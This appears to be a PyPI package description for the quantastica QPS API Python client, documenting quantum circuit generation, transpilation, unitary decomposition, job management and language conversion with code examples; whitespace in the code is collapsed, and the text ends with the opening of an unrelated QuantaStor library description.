Configure QPS API package with your API token:fromquantastica.qps_apiimportQPSQPS.save_account(\"YOUR_API_TOKEN\")That will create a local configuration file where your API token will be stored for future use.Now you are ready to use QPS API.Quick start example:find circuit from initial/final vector pairs using Quantum Algorithm Generatorfromquantastica.qps_apiimportQPSvector_pairs=[[[1,0,0,0],[0.5+0j,0.5+0j,0.5+0j,0.5+0j]],[[0,1,0,0],[0.5+0j,0+0.5j,-0.5+0j,0-0.5j]],[[0,0,1,0],[0.5+0j,-0.5+0j,0.5+0j,-0.5+0j]],[[0,0,0,1],[0.5+0j,0-0.5j,-0.5+0j,0+0.5j]]]job_id=QPS.generator.circuit_from_vectors(vector_pairs,settings={\"instruction_set\":[\"h\",\"cu1\",\"swap\"]})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Account managementQPS.save_account(api_token, api_url=None)Run this onceto setup your QPS REST API account. Method will create configuration file and your api token will be stored there for future use.If needed, you can clear your token by runningQPS.save_account(\"\")(or by deleting a configuration file).Ifapi_urlis not provided thenhttps://quantum-circuit.com/api/will be set as default.QPS.config_path()You can get config file path by runningQPS.config_path().Default configuration file path:On Unix, directory is obtained from environment variable HOME if it is set; otherwise the current user\u2019s home directory is looked up in the password directory through the built-in module pwd.On Windows, USERPROFILE will be used if set, otherwise a combination of HOMEPATH and HOMEDRIVE will be used.Quantum Algorithm Generator APIQuantum Algorithm Generatoris a tool based on machine learning which reverse engineers quantum circuits from state vectors (wave functions). Additionally, it can be used to find quantum algorithm for boolean function from truth table, to transpile circuits and to decompose unitary matrices.Generator job managementProblem sent to generator is called a \"job\". Each job has unique ID. As generator is resource intensive tool, it is configured to execute only one job at a time. While generator is solving a job, other jobs are queued. When generator finishes executing a job, it takes the next one from the queue.API provides functions for job manipulation: you can list all jobs (filtered by status), stop running job, cancel queued jobs, stop/cancel all jobs, start previously canceled (draft) job, etc.QPS.generator.list_jobs(status_filter=None)List all jobs, optionally filtered by status.status_filterString, optional. 
Can be:draft,queued,running,error,done.Example 1- list all (unfiltered) generator jobs:fromquantastica.qps_apiimportQPSjobs=QPS.generator.list_jobs()print(jobs)Example output:{\n\t\"list\": [\n\t\t{ \"_id\": \"r9LskFoLPQW5w7HTp\", \"name\": \"Bell state\", \"type\": \"vectors\", \"status\": \"done\" },\n\t\t{ \"_id\": \"R8tJH7XoZ233oTREy\", \"name\": \"4Q Gauss\", \"type\": \"vectors\", \"status\": \"queued\" },\n\t\t{ \"_id\": \"h7fzYbFz8MJvkNhiX\", \"name\": \"Challenge\", \"type\": \"unitary\", \"status\": \"draft\" },\n\t\t{ \"_id\": \"PC5PNXiGqhh2HmkX8\", \"name\": \"Experiment\", \"type\": \"vectors\", \"status\": \"error\"},\n\t\t{ \"_id\": \"SNhiCqSCT2WwRWKCd\", \"name\": \"Decompose\", \"type\": \"unitary\", \"status\": \"running\" }\n\t]\n}Example 2- listrunningjobs:fromquantastica.qps_apiimportQPSjobs=QPS.generator.list_jobs(status_filter=\"running\")print(jobs)Example output:{\n\t\"list\": [\n\t\t{ \"_id\": \"SNhiCqSCT2WwRWKCd\", \"name\": \"Decompose\", \"type\": \"unitary\", \"status\": \"running\" }\n\t]\n}QPS.generator.job_status(job_id)Get job status.Example:fromquantastica.qps_apiimportQPSstatus=QPS.generator.job_status(\"PC5PNXiGqhh2HmkX8\")print(status)Example output:{ \"_id\": \"PC5PNXiGqhh2HmkX8\", \"name\": \"Experiment\", \"type\": \"vectors\", \"status\": \"error\", \"message\": \"connect ECONNREFUSED\" }QPS.generator.get_job(job_id, wait=True)Get generator job referenced by ID. Ifwaitargument isTrue(default), then function will wait for a job to finish (or fail) before returning. IfwaitisFalse, then job will be immediatelly returned even if it is still running (in which case it will not contain a solution).Example:fromquantastica.qps_apiimportQPSjob=QPS.generator.get_job(\"r9LskFoLPQW5w7HTp\")print(job)Example output:{\n\t\"_id\": \"r9LskFoLPQW5w7HTp\",\n\t\"name\": \"Bell\",\n\t\"type\": \"vectors\",\n\t\"source\": {\n\t\t\"vectors\": {\n\t\t\t\"text1\": \"[ 1, 0, 0, 0 ]\",\n\t\t\t\"text2\": \"[ 1/sqrt(2), 0, 0, 1/sqrt(2) ]\",\n\t\t\t\"endianness1\": \"little\",\n\t\t\t\"endianness2\": \"little\"\n\t\t}\n\t},\n\t\"problem\": [\n\t\t{\n\t\t\t\"input\": [ 1, 0, 0, 0 ],\n\t\t\t\"output\": [ 0.7071067811865475, 0, 0, 0.7071067811865475 ]\n\t\t}\n\t],\n\t\"settings\": {\n\t\t\"max_diff\": 0.001,\n\t\t\"diff_method\": \"distance\",\n\t\t\"single_solution\": False,\n\t\t\"pre_processing\": \"\",\n\t\t\"allowed_gates\": \"u3,cx\",\n\t\t\"coupling_map\": [],\n\t\t\"min_gates\": 0,\n\t\t\"max_gates\": 0\n\t},\n\t\"status\": \"done\",\n\t\"output\": {\n\t\t\"circuits\": [\n\t\t\t{\n\t\t\t\t\"qubits\": 2,\n\t\t\t\t\"cregs\": [],\n\t\t\t\t\"diff\": 0,\n\t\t\t\t\"program\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\": \"u3\",\n\t\t\t\t\t\t\"wires\": [ 0 ],\n\t\t\t\t\t\t\"options\": {\n\t\t\t\t\t\t\t\"params\": {\n\t\t\t\t\t\t\t\t\"theta\": -1.570796370506287,\n\t\t\t\t\t\t\t\t\"phi\": -3.141592741012573,\n\t\t\t\t\t\t\t\t\"lambda\": -5.327113628387451\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\": \"cx\",\n\t\t\t\t\t\t\"wires\": [ 0, 1 ],\n\t\t\t\t\t\t\"options\": {}\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\t\"index\": 0,\n\t\t\t\t\"qasm\": \"OPENQASM 2.0;\\ninclude \\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[0];\\ncx q[0], q[1];\\n\",\n\t\t\t\t\"qasmExt\": \"OPENQASM 2.0;\\ninclude \\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[0];\\ncx q[0], q[1];\\n\"\n\t\t\t},\n\t\t\t{\n\t\t\t\t\"qubits\": 2,\n\t\t\t\t\"cregs\": [],\n\t\t\t\t\"diff\": 
0,\n\t\t\t\t\"program\": [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\": \"u3\",\n\t\t\t\t\t\t\"wires\": [ 1 ],\n\t\t\t\t\t\t\"options\": {\n\t\t\t\t\t\t\t\"params\": {\n\t\t\t\t\t\t\t\t\"theta\": -1.570796370506287,\n\t\t\t\t\t\t\t\t\"phi\": -3.141592741012573,\n\t\t\t\t\t\t\t\t\"lambda\": -5.327113628387451\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\": \"cx\",\n\t\t\t\t\t\t\"wires\": [ 1, 0 ],\n\t\t\t\t\t\t\"options\": {}\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\t\"index\": 1,\n\t\t\t\t\"qasm\": \"OPENQASM 2.0;\\ninclude \\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[1];\\ncx q[1], q[0];\\n\",\n\t\t\t\t\"qasmExt\": \"OPENQASM 2.0;\\ninclude \\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[1];\\ncx q[1], q[0];\\n\"\t\t\t\t\n\t\t\t}\n\t\t],\n\t\t\"error_code\": 0,\n\t\t\"message\": \"\",\n\t\t\"time_taken\": 0.002,\n\t\t\"version\": \"0.1.0\"\n\t},\n\t\"queuedAt\": \"2021-02-06T23:39:29.676Z\",\n\t\"startedAt\": \"2021-02-06T23:39:29.926Z\",\n\t\"finishedAt\": \"2021-02-06T23:39:30.383Z\"\n}QPS.generator.stop_job(job_id)Stop running or cancel queued job. Job will be put intodraftstate, and you can start it again later by callingstart_job().Example:fromquantastica.qps_apiimportQPSresponse=QPS.generator.stop_job(\"SNhiCqSCT2WwRWKCd\")print(response)Example output:{ _id: \"SNhiCqSCT2WwRWKCd\", message: \"OK\" }QPS.generator.stop_all_jobs(status_filter=None)Stop running job / cancel all queued jobs.status_filter- you can stop only a running job by providingstatus_filter=\"running\"(after this, next job from the queue will be executed). Or, you can cancel all queued jobs by providingstatus_filter=\"queued\"(running job will not be affected - it will continue running).Example 1- stop running job and remove all jobs from queue:fromquantastica.qps_apiimportQPSstopped=QPS.generator.stop_all_jobs()print(stopped)Example output:{\n\t\"stopped\": [ \n\t\t{ \"_id\": \"SNhiCqSCT2WwRWKCd\", \"name\": \"Decompose\", \"type\": \"unitary\" },\n\t\t{ \"_id\": \"R8tJH7XoZ233oTREy\", \"name\": \"4Q Gauss\", \"type\": \"vectors\" }\n\t]\n}Example 2- stop only a running job. Next job from queue, if any, will start:fromquantastica.qps_apiimportQPSstopped=QPS.generator.stop_all_jobs(status_filter=\"running\")print(stopped)Example output:{\n\t\"stopped\": [\n\t\t{ \"_id\": \"SNhiCqSCT2WwRWKCd\", \"name\": \"Decompose\", \"type\": \"unitary\" }\n\t]\n}Example 3- cancel all queued jobs. Running job will not be affected:fromquantastica.qps_apiimportQPSstopped=QPS.generator.stop_all_jobs(status_filter=\"queued\")print(stopped)Example output:{\n\t\"stopped\": [\n\t\t{ \"_id\": \"R8tJH7XoZ233oTREy\", \"name\": \"4Q Gauss\", \"type\": \"vectors\" }\n\t]\n}QPS.generator.start_job(job_id)Start previously stopped/canceled job (can be any job with statusdraft).Example:fromquantastica.qps_apiimportQPSresponse=QPS.generator.start_job(\"SNhiCqSCT2WwRWKCd\")print(response)Example output:{ _id: \"SNhiCqSCT2WwRWKCd\", message: \"OK\" }Circuit from vectorsFind quantum circuit from pairs of initial & final state vectors (wave functions).QPS.generator.circuit_from_vectors(vector_pairs, endianness = \"little\", job_name=None, settings = {}, start_job=True)vector_pairsis list containing vector pairs. Each vector pair is list with 2 elements: initial vector and final vector. All vectors in all pairs must be of same length (same number of qubits).endiannessstring. 
Orientation of bits in state vector (most significant bit/first qubit or least significant bit/first qubit). Can belittle(like Qiskit) orbig. Default islittle.job_namestring is optional. You can give it a human readable name.settingsobject is optional. Default is:{\"allowed_gates\":\"u3,cx\",\"max_diff\":1e-3,\"diff_method\":\"distance\",\"single_solution\":True,\"pre_processing\":\"\"}Note: ifsettingsargument is provided, it will overwrite default values, but only provided keys will be overwritten - not entire default settings object.start_jobif this argument isTrue(default) the job will be immediatelly sent to execution queue. Ifstart_jobisFalsethen it will stay indraftstate and you will be able to start it later by callingstart_job()method.Example:fromquantastica.qps_apiimportQPSvector_pairs=[[[1,0,0,0],[0.5+0j,0.5+0j,0.5+0j,0.5+0j]],[[0,1,0,0],[0.5+0j,0+0.5j,-0.5+0j,0-0.5j]],[[0,0,1,0],[0.5+0j,-0.5+0j,0.5+0j,-0.5+0j]],[[0,0,0,1],[0.5+0j,0-0.5j,-0.5+0j,0+0.5j]]]job_id=QPS.generator.circuit_from_vectors(vector_pairs,settings={\"instruction_set\":[\"h\",\"cu1\",\"swap\"],\"single_solution\":False})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\nswap q[0], q[1];\ncu1 (2.356194496154785) q[0], q[1];\nh q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\ncu1 (2.356194496154785) q[0], q[1];\nh q[0];\nswap q[0], q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\ncu1 (2.356194496154785) q[0], q[1];\nswap q[0], q[1];\nh q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nswap q[0], q[1];\nh q[0];\ncu1 (2.356194496154785) q[0], q[1];\nh q[1];State preparationGet circuit which will transform ground state (all qubits reset) to desired final state vector.QPS.generator.state_preparation(final_vector, endianness = \"little\", job_name=None, settings = {}, start_job=True)final_vectoris target vector.endiannessstring. Orientation of bits in state vector (most significant bit/first qubit or least significant bit/first qubit). Can belittle(like Qiskit) orbig. Default islittle.job_namestring is optional. You can give it a human readable name.settingsobject is optional. Default: seeQPS.generator.circuit_from_vectors().start_jobif this argument isTrue(default) the job will be immediatelly sent to execution queue. Ifstart_jobisFalsethen it will stay indraftstate and you will be able to start it later by callingstart_job()method.Example:fromquantastica.qps_apiimportQPSdesired_state=[0.5,0.5,0.5,0.5]job_id=QPS.generator.state_preparation(desired_state,settings={\"instruction_set\":[\"u3\",\"cx\"]})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nu3 (1.570796370506287, 0, 1.217840194702148) q[0];\nu3 (1.570796370506287, 0, 0.621559917926788) q[1];TranspileTranspile circuit (change instruction set).QPS.generator.transpile(input_qasm, method=\"replace_blocks\", method_options={}, job_name=None, settings = {}, start_job=True)input_qasmis string containing OpenQASM 2.0 code.methodis method name string. Can be one of: \"replace_circuit\", \"replace_blocks\", \"replace_gates\". 
Default: \"replace_blocks\".method_optionsdict with following structure:If method isreplace_blocksthen:{ \"block_size\": 2, \"two_pass\": False }(maximum block size is 4).For other methods: no options (method_optionsis ignored)job_namestring is optional. You can give it a human readable name.settingsobject is optional. Default is:{\"allowed_gates\":\"u3,cx\",\"max_diff\":1e-3,\"diff_method\":\"distance\",\"single_solution\":True,\"pre_processing\":\"experimental1\"}Defaultdiff_methodisdistance, which means that input and output circuit's global phase will match. That also means longer running time and possibly deeper output circuit (especially with new IBM's instruction setid, x, sx, rz, cx). If you are relaxed about global phase (like Qiskit's transpile method), then provide\"diff_method\": \"ignorephase\"insettings.Note: ifsettingsargument is provided, it will overwrite default values, but only provided keys will be overwritten - not entire default settings object.start_jobif this argument isTrue(default) the job will be immediatelly sent to execution queue. Ifstart_jobisFalsethen it will stay indraftstate and you will be able to start it later by callingstart_job()method.Example:fromquantastica.qps_apiimportQPSinput_qasm=\"\"\"OPENQASM 2.0;include \"qelib1.inc\";qreg q[2];h q[0];cx q[0], q[1];\"\"\"job_id=QPS.generator.transpile(input_qasm,settings={\"instruction_set\":[\"id\",\"x\",\"sx\",\"rz\",\"cx\"],\"diff_method\":\"ignorephase\"})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nsx q[0];\nrz (1.570796370506287) q[0];\nsx q[0];\ncx q[0], q[1];Decompose matrixDecompose unitary matrix (find circuit from matrix).QPS.generator.decompose_unitary(unitary, endianness = \"big\", job_name=None, settings = {}, start_job=True)unitarymatrix operator.endianness- orientation of the matrix. Can belittleendian (like Qiskit) orbigendian. Default isbig. Note that default endianness of the matrix differs from default endianness of vectors in other methods. That's to be aligned with QPS. In Qiskit, both matrices and vectors arelittleendian. So, if you are solving unitary from Qiskit then provideendianness = \"little\"argument.job_namestring is optional. You can give it a human readable name.settingsobject is optional. Default is:{\"allowed_gates\":\"u3,cx\",\"max_diff\":1e-3,\"diff_method\":\"distance\",\"single_solution\":True,\"pre_processing\":\"\"}Note: ifsettingsargument is provided, it will overwrite default values, but only provided keys will be overwritten - not entire default settings object.start_jobif this argument isTrue(default) the job will be immediatelly sent to execution queue. 
Ifstart_jobisFalsethen it will stay indraftstate and you will be able to start it later by callingstart_job()method.Example:fromquantastica.qps_apiimportQPSunitary=[[0.5+0.0j,0.5+0.0j,0.5+0.0j,0.5+0.0j],[0.5+0.0j,0.5+0.0j,-0.5+0.0j,-0.5+0.0j],[0.5+0.0j,-0.5+0.0j,0.0+0.5j,0.0-0.5j],[0.5+0.0j,-0.5+0.0j,0.0-0.5j,0.0+0.5j]]job_id=QPS.generator.decompose_unitary(unitary,settings={\"instruction_set\":[\"h\",\"cu1\",\"swap\"],\"single_solution\":False})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\nswap q[0], q[1];\ncu1 (1.570796370506287) q[0], q[1];\nh q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\ncu1 (1.570796370506287) q[0], q[1];\nh q[0];\nswap q[0], q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nh q[1];\ncu1 (1.570796370506287) q[0], q[1];\nswap q[0], q[1];\nh q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nswap q[0], q[1];\nh q[0];\ncu1 (1.570796370506287) q[0], q[1];\nh q[1];Create algorithm from truth tableCreate circuit which implements logical expression whose truth table is given.QPS.generator.circuit_from_truth_table(truth_table_csv, column_defs, csv_delimiter=None, additional_qubits=1, job_name=None, settings={}, start_job=True)truth_table_csvis string containing truth table in CSV formatcolumn_defslist of strings describing each column from truth table:\"input\",\"output\"or\"ignore\"csv_delimiterCSV column delimiter char:None,\",\"(comma) or\"\\t\"(tab). If delimiter isNone(default) it will be automatically detected.additional_qubitsnumber of qubits to add (to displace input and output qubits).job_namestring is optional. You can give it a human readable name.settingsobject is optional. Default is:{\"allowed_gates\":\"x,cx,ccx,swap\",\"max_diff\":1e-3,\"diff_method\":\"distance\",\"single_solution\":True,\"pre_processing\":\"\"}Example:fromquantastica.qps_apiimportQPStruth_table=\"\"\"A,B,A_NAND_B0,0,10,1,11,0,11,1,0\"\"\"job_id=QPS.generator.circuit_from_truth_table(truth_table,[\"input\",\"input\",\"output\"])job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):raiseException(job_output[\"message\"])else:if(len(job_output[\"circuits\"])==0):raiseException(\"No results.\")else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[3];\nx q[2];\nccx q[0], q[1], q[2];Run problem fileSolve problem provided in internal format used by generator.QPS.generator.solve(problem, settings = {}, start_job=True)problemobject - generator job exported to json from QPS.settingsargument is optional. If provided, it will overwrite keys inproblem.settings. Note that only provided keys will be overwritten - not entireproblem.settingsobject.start_jobif this argument isTrue(default) the job will be immediatelly sent to execution queue. 
Ifstart_jobisFalsethen it will stay indraftstate and you will be able to start it later by callingstart_job()method.Example:fromquantastica.qps_apiimportQPSproblem={\"name\":\"Bell\",\"type\":\"vectors\",\"source\":{\"vectors\":{\"text1\":\"[ 1, 0, 0, 0 ]\",\"text2\":\"[ 1/sqrt(2), 0, 0, 1/sqrt(2) ]\",\"endianness1\":\"little\",\"endianness2\":\"little\"}},\"problem\":[{\"input\":[1,0,0,0],\"output\":[0.7071067811865475,0,0,0.7071067811865475]}],\"settings\":{\"allowed_gates\":\"u3,cx\",\"coupling_map\":[],\"min_gates\":0,\"max_gates\":0,\"max_diff\":0.001,\"diff_method\":\"distance\",\"single_solution\":False,\"pre_processing\":\"\"}}job_id=QPS.generator.solve(problem)job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):print(job_output[\"message\"])else:forcircuitinjob_output[\"circuits\"]:print(circuit[\"qasm\"])Example output:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nu3 (-1.570796370506287, -3.141592741012573, -2.675650835037231) q[0];\ncx q[0], q[1];\n\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[2];\nu3 (-1.570796370506287, -3.141592741012573, -2.675650835037231) q[1];\ncx q[1], q[0];Generator output formatGenerator job object has following structure:{\"name\":String,\"type\":String,\"source\":Object,\"problem\":Array,\"settings\":Object,\"status\":String,\"output\":Object,\"queuedAt\":String,\"startedAt\":String,\"finishedAt\":String}Keys important to user are:nameString: name of the jobstatusString: can bedraft,queued,running,error,done.outputObject with following structure:{\"error_code\":Integer,\"message\":String,\"time_taken\":Float,\"version\":String,\"circuits\":ArrayofObject}error_codeInteger: 0 on success, non-zero on errormessageString: error message if error code is non-zerotime_takenFloat: number of secondsversionString: generator versioncircuitsArray: resulting circuits. 
Each is object with following structure:{\"qubits\":Integer,\"cregs\":Array,\"program\":Array,\"diff\":Float,\"index\":Integer,\"qasm\":String,\"qasmExt\":String}Keys important to user are:qasmOpenQASM 2.0 source code of the resulting circuit.qasmExtOpenQASM 2.0 with extended instruction set (all gates supported by Quantum Programming Studio).Difference betweenqasmandqasmExt: if circuit contains gate supported by QPS but not directly supported by OpenQASM 2.0 thenqasmwill contain equivalent circuit transpiled to OpenQASM 2.0 instruction set, butqasmExtwill contain gates as is.For example if circuit contains IONQ native gategpi2(2.51678906856393)on first qubit:qasmwill be:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[1];\nu3 (1.5707963267948966, 0.9459927417690333, -0.9459927417690333) q[0];qasmExtwill contain:OPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[1];\ngpi2 (2.51678906856393) q[0];Example job object with output:{\"_id\":\"r9LskFoLPQW5w7HTp\",\"name\":\"Bell\",\"type\":\"vectors\",\"source\":{\"vectors\":{\"text1\":\"[ 1, 0, 0, 0 ]\",\"text2\":\"[ 1/sqrt(2), 0, 0, 1/sqrt(2) ]\",\"endianness1\":\"little\",\"endianness2\":\"little\"}},\"problem\":[{\"input\":[1,0,0,0],\"output\":[0.7071067811865475,0,0,0.7071067811865475]}],\"settings\":{\"max_diff\":0.001,\"diff_method\":\"distance\",\"single_solution\":False,\"pre_processing\":\"\",\"allowed_gates\":\"u3,cx\",\"coupling_map\":[],\"min_gates\":0,\"max_gates\":0},\"status\":\"done\",\"output\":{\"circuits\":[{\"qubits\":2,\"cregs\":[],\"diff\":0,\"program\":[{\"name\":\"u3\",\"wires\":[0],\"options\":{\"params\":{\"theta\":-1.570796370506287,\"phi\":-3.141592741012573,\"lambda\":-5.327113628387451}}},{\"name\":\"cx\",\"wires\":[0,1],\"options\":{}}],\"index\":0,\"qasm\":\"OPENQASM 2.0;\\ninclude\\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[0];\\ncx q[0], q[1];\\n\",\"qasmExt\":\"OPENQASM 2.0;\\ninclude\\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[0];\\ncx q[0], q[1];\\n\"},{\"qubits\":2,\"cregs\":[],\"diff\":0,\"program\":[{\"name\":\"u3\",\"wires\":[1],\"options\":{\"params\":{\"theta\":-1.570796370506287,\"phi\":-3.141592741012573,\"lambda\":-5.327113628387451}}},{\"name\":\"cx\",\"wires\":[1,0],\"options\":{}}],\"index\":1,\"qasm\":\"OPENQASM 2.0;\\ninclude\\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[1];\\ncx q[1], q[0];\\n\",\"qasmExt\":\"OPENQASM 2.0;\\ninclude\\\"qelib1.inc\\\";\\nqreg q[2];\\nu3 (-1.570796370506287, -3.141592741012573, -5.327113628387451) q[1];\\ncx q[1], q[0];\\n\"}],\"error_code\":0,\"message\":\"\",\"time_taken\":0.002,\"version\":\"0.1.0\"},\"createdAt\":\"2021-02-06T23:39:29.108Z\",\"modifiedAt\":\"2021-02-06T23:39:30.383Z\",\"queuedAt\":\"2021-02-06T23:39:29.676Z\",\"startedAt\":\"2021-02-06T23:39:29.926Z\",\"finishedAt\":\"2021-02-06T23:39:30.383Z\"}Using Generator with QiskitGenerator is using OpenQASM 2.0 format for input and output, so integration with Qiskit (and other frameworks that support QASM) is easy.Exampletranspile Qiskit circuit:fromqiskitimportQuantumCircuitfromqiskit.circuit.randomimportrandom_circuitfromqiskit.quantum_infoimportOperatorfromquantastica.qps_apiimportQPS# Generate random Qiskit circuitqc=random_circuit(5,5,measure=False)# Get QASM codeinput_qasm=qc.qasm()# Transpile with 
generatorjob_id=QPS.generator.transpile(input_qasm,settings={\"instruction_set\":[\"id\",\"u3\",\"cx\"],\"diff_method\":\"ignorephase\"})job=QPS.generator.get_job(job_id,wait=True)job_status=job[\"status\"]job_output=job[\"output\"]if(job_status==\"error\"):raiseException(job_output[\"message\"])transpiled_circuit=job_output[\"circuits\"][0]# Get QASM codetranspiled_qasm=transpiled_circuit[\"qasm\"]# Create Qiskit circuittranspiled_qc=QuantumCircuit.from_qasm_str(transpiled_qasm)# Show circuitprint(\"Depth:\",transpiled_qc.depth())print(\"Ops:\",sum(jfori,jintranspiled_qc.count_ops().items()))display(transpiled_qc.draw(output=\"mpl\"))Quantum Language Converter APIQuantum Language Converteris a tool which converts quantum program between different quantum programming languages and frameworks. It is also available as aq-convertcommand line tool and as a web UI athttps://quantum-circuit.com/qconvert.QPS has integrated quantum language converter API which you can access directly from python code:QPS.converter.convert(input, source, dest)Convertsinputquantum program given as string fromsourceformat intodestformat.inputString. Program source codesourceString. Input format:qasmOpenQASM 2.0source codequilQuilsource codeqobjQObjionqIONQ(json)quantum-circuitquantum-circuitobject (json)toasterQubit Toasterobject (json)destString. Output format:qiskitQiskitqasmOpenQASM 2.0qasm-extOpenQASM 2.0 with complete instruction set supported by QPS (and other Quantastica tools)qobjQObjquilQuilpyquilpyQuilbraketBraketcirqCirqtfqTensorFlow QuantumqsharpQSharpquestQuESTjsquantum-circuit(javascript)quantum-circuitquantum-circuit(json)toasterQubit ToastersvgSVG (standalone)svg-inlineSVG (inline)Example 1- convert QASM 2.0 program to QUIL:fromquantastica.qps_apiimportQPSinput_program=\"\"\"OPENQASM 2.0;include \"qelib1.inc\";qreg q[2];creg c[2];h q[0];cx q[0], q[1];measure q[0] -> c[0];measure q[1] -> c[1];\"\"\"output_program=QPS.converter.convert(input_program,\"qasm\",\"quil\")print(output_program)Output:DECLARE ro BIT[2]\nH 0\nCNOT 0 1\nMEASURE 0 ro[0]\nMEASURE 1 ro[1]Example 2- convert QASM 2.0 program to circuit drawing as vector image:fromquantastica.qps_apiimportQPSinput_program=\"\"\"OPENQASM 2.0;include \"qelib1.inc\";qreg q[2];creg c[2];h q[0];cx q[0], q[1];measure q[0] -> c[0];measure q[1] -> c[1];\"\"\"output_svg=QPS.converter.convert(input_program,\"qasm\",\"svg\")open(\"output.svg\",\"w\").write(output_svg)Utils APIQPS.utils.random_circuit(num_qubits=5, output_format=\"quantum-circuit\", options=None)Returns random quantum circuit.num_qubitsInteger. Number of qubits. Default:5.formatString. Output format. The same asQPS.converter.convert()function'sdestargument. Example:\"qasm\". Default:\"quantum-circuit\".optionsDict. Optional. Can contain following keys:instruction_setList of gates to use. Example:[\"u3\", \"cx\"]. Default:[ \"u3\", \"rx\", \"ry\", \"rz\", \"cx\", \"cz\" ].num_gatesInteger. Number of gates in the circuit. Default isnum_qubits * 8.mid_circuit_measurementBool. Default:False.mid_circuit_resetBool. Default:False.classic_controlBool. Default:False."} +{"package": "quantastor-pkg", "pacakge-description": "QuantaStorOSNEXUS QuantaStor Python Client LibraryThe python library for QuantaStor simplifies the process of automating QuantaStor management operations via python scripts. 
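The quantastica entry above documents each QPS.generator call separately; the sketch below chains a few of them into one workflow - creating a state-preparation job as a draft, starting it, polling its status, fetching the result and rendering the returned QASM as an SVG through the converter API. It assumes QPS access is already configured as that entry describes; the target state, job name and output file name are illustrative.

import time
from quantastica.qps_api import QPS

# Illustrative target state: equal superposition on two qubits
desired_state = [0.5, 0.5, 0.5, 0.5]

# Create the job as a draft; start_job=False keeps it in the "draft" state
job_id = QPS.generator.state_preparation(
    desired_state,
    job_name="Example state preparation",  # illustrative name
    settings={"instruction_set": ["u3", "cx"]},
    start_job=False,
)

# Send the draft to the execution queue
QPS.generator.start_job(job_id)

# Poll until the job leaves the queued/running states
while QPS.generator.job_status(job_id)["status"] in ("queued", "running"):
    time.sleep(1)

# Fetch the finished job (get_job with wait=True would also block until done)
job = QPS.generator.get_job(job_id, wait=True)
if job["status"] == "error":
    raise Exception(job["output"]["message"])

qasm = job["output"]["circuits"][0]["qasm"]
print(qasm)

# Render the circuit as a standalone SVG via the converter API
open("state_prep.svg", "w").write(QPS.converter.convert(qasm, "qasm", "svg"))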
